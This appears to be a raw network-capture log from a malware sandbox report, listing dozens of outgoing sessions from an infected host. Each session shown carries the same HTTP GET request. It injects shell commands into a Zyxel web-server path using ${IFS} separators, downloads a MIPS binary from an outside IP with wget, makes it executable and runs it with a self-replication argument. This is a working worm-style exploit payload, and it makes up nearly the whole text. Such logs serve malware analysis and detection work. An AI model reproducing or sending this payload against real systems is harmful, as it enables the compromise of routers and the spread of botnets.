                                                Jan 29, 2024 07:06:54.793396950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.2.2356530196.28.170.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793431044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.2.2350406115.47.165.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793473005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                77192.168.2.235992081.161.213.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793643951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                78192.168.2.2335610164.226.205.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793714046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                79192.168.2.2357274212.94.136.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793751001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.2.234007062.38.7.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793776035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.2.236082647.167.89.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793828011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.2.2358920191.193.129.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793842077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.2.234116240.78.155.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793958902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                84192.168.2.2350216175.156.0.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.793987036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                85192.168.2.234418663.245.100.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794038057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                86192.168.2.235361613.51.15.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794090986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                87192.168.2.233310076.230.166.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794138908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                88192.168.2.234071064.33.87.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794313908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                89192.168.2.2349834116.109.171.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794400930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                90192.168.2.2358826205.187.210.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794445038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                91192.168.2.233841653.125.44.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794524908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                92192.168.2.2335688192.101.205.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794677019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                93192.168.2.2335944157.152.6.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794708014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                94192.168.2.2349580204.134.29.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794823885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                95192.168.2.235806080.103.76.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794895887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                96192.168.2.233414865.187.246.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.794914007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                97192.168.2.233893066.117.61.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795151949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                98192.168.2.235879881.13.189.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795186996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                99192.168.2.235351478.45.112.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795253992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                100192.168.2.234728253.63.227.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795310974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                101192.168.2.2343512213.122.144.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795449018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                102192.168.2.233537442.1.96.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795505047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                103192.168.2.2352310140.2.160.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795600891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                104192.168.2.2360772198.67.235.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795681953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                105192.168.2.234508453.108.46.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795734882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                106192.168.2.2334118207.201.25.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795761108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                107192.168.2.2342412101.248.64.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.795993090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                108192.168.2.235995495.6.110.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796041012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                109192.168.2.234329454.206.80.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796070099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                110192.168.2.233324052.247.153.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796148062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                111192.168.2.2349140129.215.179.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796300888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                112192.168.2.2343854193.37.126.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796401024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                113192.168.2.2358406169.214.16.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796468019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                114192.168.2.2335162120.252.228.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796583891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                115192.168.2.233881890.139.165.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796663046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                116192.168.2.235211032.247.235.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796694040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                117192.168.2.235471879.110.76.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796786070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                118192.168.2.2356048211.41.53.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796842098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                119192.168.2.2351962135.65.151.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796968937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                120192.168.2.2333328120.155.74.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.796989918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                121192.168.2.233665644.41.29.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797069073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                122192.168.2.233790677.186.35.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797125101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                123192.168.2.2337996168.40.25.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797216892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                124192.168.2.2360098211.91.18.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797296047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                125192.168.2.2352144201.14.179.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797406912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                126192.168.2.2345258191.197.190.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797508955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                127192.168.2.234350693.216.163.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797543049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                128192.168.2.2356238208.190.248.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797605991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                129192.168.2.2347510125.169.211.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797662020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                130192.168.2.234668877.132.108.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797808886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                131192.168.2.2338306133.141.153.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797910929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                132192.168.2.23433829.170.251.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797914982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                133192.168.2.2336412157.6.235.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.797985077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                134192.168.2.234580296.91.103.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798027992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                135192.168.2.235957674.168.108.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798114061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                136192.168.2.2360166146.10.221.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798202038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                137192.168.2.2359430185.193.167.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:06:54.798306942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                138192.168.2.2352674168.182.24.153443
                                                TimestampBytes transferredDirectionData
